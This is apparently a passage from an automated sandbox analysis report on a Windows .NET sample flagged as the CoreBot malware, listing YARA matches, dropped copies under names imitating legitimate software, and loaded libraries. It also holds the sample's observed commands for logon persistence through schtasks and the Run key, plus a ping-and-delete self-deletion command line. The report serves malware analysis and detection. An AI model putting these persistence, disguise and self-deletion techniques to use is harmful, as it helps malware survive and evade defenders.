                    Source: random.exe, 00000001.00000000.1340305502.0000000000CFC000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameAnubis.exeD vs random.exe
                    Source: random.exe, 00000001.00000002.2007218382.0000000001344000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAnubis.exeD vs random.exe
                    Source: random.exe, 00000001.00000002.2008201035.000000000338F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAnubis.exeD vs random.exe
                    Source: random.exeBinary or memory string: OriginalFilenameAnubis.exeD vs random.exe
                    Source: random.exe.1.drBinary or memory string: OriginalFilenameAnubis.exeD vs random.exe
                    Source: random.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: random.exe, type: SAMPLEMatched rule: MALWARE_Win_CoreBot author = ditekSHen, description = Detects CoreBot, snort_sid = 920211-920212
                    Source: 1.0.random.exe.cf0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoreBot author = ditekSHen, description = Detects CoreBot, snort_sid = 920211-920212
                    Source: C:\Users\user\OneDrive\jdownloader.exe, type: DROPPEDMatched rule: MALWARE_Win_CoreBot author = ditekSHen, description = Detects CoreBot, snort_sid = 920211-920212
                    Source: C:\Users\user\OneDrive\windows multimedia platform.exe, type: DROPPEDMatched rule: MALWARE_Win_CoreBot author = ditekSHen, description = Detects CoreBot, snort_sid = 920211-920212
                    Source: C:\Users\user\OneDrive\autoit3.exe, type: DROPPEDMatched rule: MALWARE_Win_CoreBot author = ditekSHen, description = Detects CoreBot, snort_sid = 920211-920212
                    Source: C:\Users\user\OneDrive\windowspowershell.exe, type: DROPPEDMatched rule: MALWARE_Win_CoreBot author = ditekSHen, description = Detects CoreBot, snort_sid = 920211-920212
                    Source: C:\Users\user\OneDrive\reference assemblies.exe, type: DROPPEDMatched rule: MALWARE_Win_CoreBot author = ditekSHen, description = Detects CoreBot, snort_sid = 920211-920212
                    Source: C:\Users\user\OneDrive\windows mail.exe, type: DROPPEDMatched rule: MALWARE_Win_CoreBot author = ditekSHen, description = Detects CoreBot, snort_sid = 920211-920212
                    Source: C:\Users\user\OneDrive\common files.exe, type: DROPPEDMatched rule: MALWARE_Win_CoreBot author = ditekSHen, description = Detects CoreBot, snort_sid = 920211-920212
                    Source: C:\Users\user\OneDrive\microsoft.exe, type: DROPPEDMatched rule: MALWARE_Win_CoreBot author = ditekSHen, description = Detects CoreBot, snort_sid = 920211-920212
                    Source: C:\Users\user\OneDrive\windows defender.exe, type: DROPPEDMatched rule: MALWARE_Win_CoreBot author = ditekSHen, description = Detects CoreBot, snort_sid = 920211-920212
                    Source: C:\Users\user\OneDrive\windows sidebar.exe, type: DROPPEDMatched rule: MALWARE_Win_CoreBot author = ditekSHen, description = Detects CoreBot, snort_sid = 920211-920212
                    Source: C:\Users\user\OneDrive\windows photo viewer.exe, type: DROPPEDMatched rule: MALWARE_Win_CoreBot author = ditekSHen, description = Detects CoreBot, snort_sid = 920211-920212
                    Source: C:\Users\user\OneDrive\msecache.exe, type: DROPPEDMatched rule: MALWARE_Win_CoreBot author = ditekSHen, description = Detects CoreBot, snort_sid = 920211-920212
                    Source: C:\Users\user\OneDrive\java.exe, type: DROPPEDMatched rule: MALWARE_Win_CoreBot author = ditekSHen, description = Detects CoreBot, snort_sid = 920211-920212
                    Source: C:\Users\user\OneDrive\internet explorer.exe, type: DROPPEDMatched rule: MALWARE_Win_CoreBot author = ditekSHen, description = Detects CoreBot, snort_sid = 920211-920212
                    Source: C:\Users\user\OneDrive\mozilla maintenance service.exe, type: DROPPEDMatched rule: MALWARE_Win_CoreBot author = ditekSHen, description = Detects CoreBot, snort_sid = 920211-920212
                    Source: C:\Users\user\OneDrive\windows nt.exe, type: DROPPEDMatched rule: MALWARE_Win_CoreBot author = ditekSHen, description = Detects CoreBot, snort_sid = 920211-920212
                    Source: C:\Users\user\AppData\Roaming\random.exe, type: DROPPEDMatched rule: MALWARE_Win_CoreBot author = ditekSHen, description = Detects CoreBot, snort_sid = 920211-920212
                    Source: C:\Users\user\OneDrive\microsoft.net.exe, type: DROPPEDMatched rule: MALWARE_Win_CoreBot author = ditekSHen, description = Detects CoreBot, snort_sid = 920211-920212
                    Source: C:\Users\user\OneDrive\windows media player.exe, type: DROPPEDMatched rule: MALWARE_Win_CoreBot author = ditekSHen, description = Detects CoreBot, snort_sid = 920211-920212
                    Source: C:\Users\user\OneDrive\google.exe, type: DROPPEDMatched rule: MALWARE_Win_CoreBot author = ditekSHen, description = Detects CoreBot, snort_sid = 920211-920212
                    Source: C:\Users\user\OneDrive\mmzjdoevgizobizuwenrntjysakvaaofwgwplryd.exe, type: DROPPEDMatched rule: MALWARE_Win_CoreBot author = ditekSHen, description = Detects CoreBot, snort_sid = 920211-920212
                    Source: C:\Users\user\OneDrive\microsoft office.exe, type: DROPPEDMatched rule: MALWARE_Win_CoreBot author = ditekSHen, description = Detects CoreBot, snort_sid = 920211-920212
                    Source: C:\Users\user\OneDrive\windows portable devices.exe, type: DROPPEDMatched rule: MALWARE_Win_CoreBot author = ditekSHen, description = Detects CoreBot, snort_sid = 920211-920212
                    Source: C:\Users\user\OneDrive\msbuild.exe, type: DROPPEDMatched rule: MALWARE_Win_CoreBot author = ditekSHen, description = Detects CoreBot, snort_sid = 920211-920212
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exe, type: DROPPEDMatched rule: MALWARE_Win_CoreBot author = ditekSHen, description = Detects CoreBot, snort_sid = 920211-920212
                    Source: classification engineClassification label: mal100.troj.evad.winEXE@14/52@1/2
                    Source: C:\Users\user\Desktop\random.exeFile created: C:\Users\user\AppData\Roaming\random.exeJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:744:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1096:120:WilError_03
                    Source: random.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: random.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\random.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\random.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\random.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\random.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\random.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: random.exeReversingLabs: Detection: 21%
                    Source: random.exeVirustotal: Detection: 31%
                    Source: C:\Users\user\Desktop\random.exeFile read: C:\Users\user\Desktop\random.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\random.exe "C:\Users\user\Desktop\random.exe"
                    Source: C:\Users\user\Desktop\random.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /Create /SC ONLOGON /TN "TaskHelper" /TR "C:\Users\user\Desktop\random.exe" /F
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Users\user\Desktop\random.exe C:\Users\user\Desktop\random.exe
                    Source: unknownProcess created: C:\Users\user\Desktop\random.exe "C:\Users\user\Desktop\random.exe"
                    Source: unknownProcess created: C:\Users\user\Desktop\random.exe "C:\Users\user\Desktop\random.exe"
                    Source: C:\Users\user\Desktop\random.exeProcess created: C:\Users\user\AppData\Roaming\cEp3d38.exe "C:\Users\user\AppData\Roaming\cEp3d38.exe"
                    Source: C:\Users\user\Desktop\random.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del "C:\Users\user\Desktop\random.exe"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 4000
                    Source: C:\Users\user\Desktop\random.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /Create /SC ONLOGON /TN "TaskHelper" /TR "C:\Users\user\Desktop\random.exe" /FJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess created: C:\Users\user\AppData\Roaming\cEp3d38.exe "C:\Users\user\AppData\Roaming\cEp3d38.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del "C:\Users\user\Desktop\random.exe"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 4000Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\random.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\random.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\random.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\random.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\random.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\random.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\random.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\random.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\random.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\random.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\random.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\random.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\random.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Users\user\Desktop\random.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\random.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\random.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Users\user\Desktop\random.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\random.exeSection loaded: linkinfo.dllJump to behavior
                    Source: C:\Users\user\Desktop\random.exeSection loaded: ntshrui.dllJump to behavior
                    Source: C:\Users\user\Desktop\random.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\random.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\random.exeSection loaded: cscapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\random.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\random.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\random.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\random.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\random.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\random.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\random.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\random.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\random.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\random.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\random.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\random.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\random.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\random.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\random.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\random.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\random.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\random.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\random.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\random.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\random.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\random.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\random.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\random.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\random.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Users\user\Desktop\random.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\random.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\random.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\random.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\random.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\random.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\random.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\random.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\random.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\random.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\random.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\random.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\random.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\random.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\random.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\random.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\random.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\random.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32Jump to behavior
                    Source: random.lnk.1.drLNK file: ..\..\..\..\..\..\..\Desktop\random.exe
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: random.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: random.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: random.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: C:\Users\Badus\OneDrive\Desktop\Bot1.0.7\Bot\LiteHTTP\obj\Debug\Anubis.pdb source: random.exe, windows photo viewer.exe.1.dr, windows nt.exe.1.dr, windows sidebar.exe.1.dr, random.exe.1.dr, microsoft.exe.1.dr, autoit3.exe.1.dr, java.exe.1.dr, windows mail.exe.1.dr, windowspowershell.exe.1.dr, jdownloader.exe.1.dr, internet explorer.exe.1.dr, msecache.exe.1.dr, common files.exe.1.dr, windows multimedia platform.exe.1.dr, mozilla maintenance service.exe.1.dr, windows defender.exe.1.dr, reference assemblies.exe.1.dr, windows media player.exe.1.dr, microsoft.net.exe.1.dr, mmzjdoevgizobizuwenrntjysakvaaofwgwplryd.exe.1.dr, cEp3d38.exe.1.dr, google.exe.1.dr, microsoft office.exe.1.dr, msbuild.exe.1.dr, windows portable devices.exe.1.dr
                    Source: Binary string: C:\Users\Badus\OneDrive\Desktop\Bot1.0.7\Bot\LiteHTTP\obj\Debug\Anubis.pdbd source: random.exe, windows photo viewer.exe.1.dr, windows nt.exe.1.dr, windows sidebar.exe.1.dr, random.exe.1.dr, microsoft.exe.1.dr, autoit3.exe.1.dr, java.exe.1.dr, windows mail.exe.1.dr, windowspowershell.exe.1.dr, jdownloader.exe.1.dr, internet explorer.exe.1.dr, msecache.exe.1.dr, common files.exe.1.dr, windows multimedia platform.exe.1.dr, mozilla maintenance service.exe.1.dr, windows defender.exe.1.dr, reference assemblies.exe.1.dr, windows media player.exe.1.dr, microsoft.net.exe.1.dr, mmzjdoevgizobizuwenrntjysakvaaofwgwplryd.exe.1.dr, cEp3d38.exe.1.dr, google.exe.1.dr, microsoft office.exe.1.dr, msbuild.exe.1.dr, windows portable devices.exe.1.dr
                    Source: C:\Users\user\Desktop\random.exeCode function: 1_2_01517300 pushfd ; retn 0147h1_2_01517379
                    Source: C:\Users\user\Desktop\random.exeCode function: 1_2_01518C80 push eax; ret 1_2_01518E17
                    Source: C:\Users\user\Desktop\random.exeFile created: C:\Users\user\OneDrive\common files.exeJump to dropped file
                    Source: C:\Users\user\Desktop\random.exeFile created: C:\Users\user\OneDrive\mozilla maintenance service.exeJump to dropped file
                    Source: C:\Users\user\Desktop\random.exeFile created: C:\Users\user\OneDrive\windows mail.exeJump to dropped file
                    Source: C:\Users\user\Desktop\random.exeFile created: C:\Users\user\OneDrive\windows sidebar.exeJump to dropped file
                    Source: C:\Users\user\Desktop\random.exeFile created: C:\Users\user\AppData\Roaming\random.exeJump to dropped file
                    Source: C:\Users\user\Desktop\random.exeFile created: C:\Users\user\OneDrive\windows nt.exeJump to dropped file
                    Source: C:\Users\user\Desktop\random.exeFile created: C:\Users\user\OneDrive\windows media player.exeJump to dropped file
                    Source: C:\Users\user\Desktop\random.exeFile created: C:\Users\user\OneDrive\reference assemblies.exeJump to dropped file
                    Source: C:\Users\user\Desktop\random.exeFile created: C:\Users\user\OneDrive\windows multimedia platform.exeJump to dropped file
                    Source: C:\Users\user\Desktop\random.exeFile created: C:\Users\user\OneDrive\java.exeJump to dropped file
                    Source: C:\Users\user\Desktop\random.exeFile created: C:\Users\user\AppData\Roaming\cEp3d38.exeJump to dropped file
                    Source: C:\Users\user\Desktop\random.exeFile created: C:\Users\user\OneDrive\jdownloader.exeJump to dropped file
                    Source: C:\Users\user\Desktop\random.exeFile created: C:\Users\user\OneDrive\mmzjdoevgizobizuwenrntjysakvaaofwgwplryd.exeJump to dropped file
                    Source: C:\Users\user\Desktop\random.exeFile created: C:\Users\user\OneDrive\autoit3.exeJump to dropped file
                    Source: C:\Users\user\Desktop\random.exeFile created: C:\Users\user\OneDrive\windows portable devices.exeJump to dropped file
                    Source: C:\Users\user\Desktop\random.exeFile created: C:\Users\user\OneDrive\msecache.exeJump to dropped file
                    Source: C:\Users\user\Desktop\random.exeFile created: C:\Users\user\OneDrive\windowspowershell.exeJump to dropped file
                    Source: C:\Users\user\Desktop\random.exeFile created: C:\Users\user\OneDrive\microsoft.net.exeJump to dropped file
                    Source: C:\Users\user\Desktop\random.exeFile created: C:\Users\user\OneDrive\windows photo viewer.exeJump to dropped file
                    Source: C:\Users\user\Desktop\random.exeFile created: C:\Users\user\OneDrive\microsoft office.exeJump to dropped file
                    Source: C:\Users\user\Desktop\random.exeFile created: C:\Users\user\OneDrive\windows defender.exeJump to dropped file
                    Source: C:\Users\user\Desktop\random.exeFile created: C:\Users\user\OneDrive\microsoft.exeJump to dropped file
                    Source: C:\Users\user\Desktop\random.exeFile created: C:\Users\user\OneDrive\google.exeJump to dropped file
                    Source: C:\Users\user\Desktop\random.exeFile created: C:\Users\user\OneDrive\internet explorer.exeJump to dropped file
                    Source: C:\Users\user\Desktop\random.exeFile created: C:\Users\user\OneDrive\msbuild.exeJump to dropped file

                    Boot Survival

                    barindex
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Users\user\Desktop\random.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /Create /SC ONLOGON /TN "TaskHelper" /TR "C:\Users\user\Desktop\random.exe" /F
                    Source: C:\Users\user\Desktop\random.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\random.lnkJump to behavior
                    Source: C:\Users\user\Desktop\random.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\random.lnkJump to behavior
                    Source: C:\Users\user\Desktop\random.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run TaskHelperJump to behavior
                    Source: C:\Users\user\Desktop\random.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run TaskHelperJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Self deletion via cmd or bat file
                    Source: C:\Users\user\Desktop\random.exeProcess created: "cmd.exe" /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del "C:\Users\user\Desktop\random.exe"
                    Source: C:\Users\user\Desktop\random.exeProcess created: "cmd.exe" /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del "C:\Users\user\Desktop\random.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
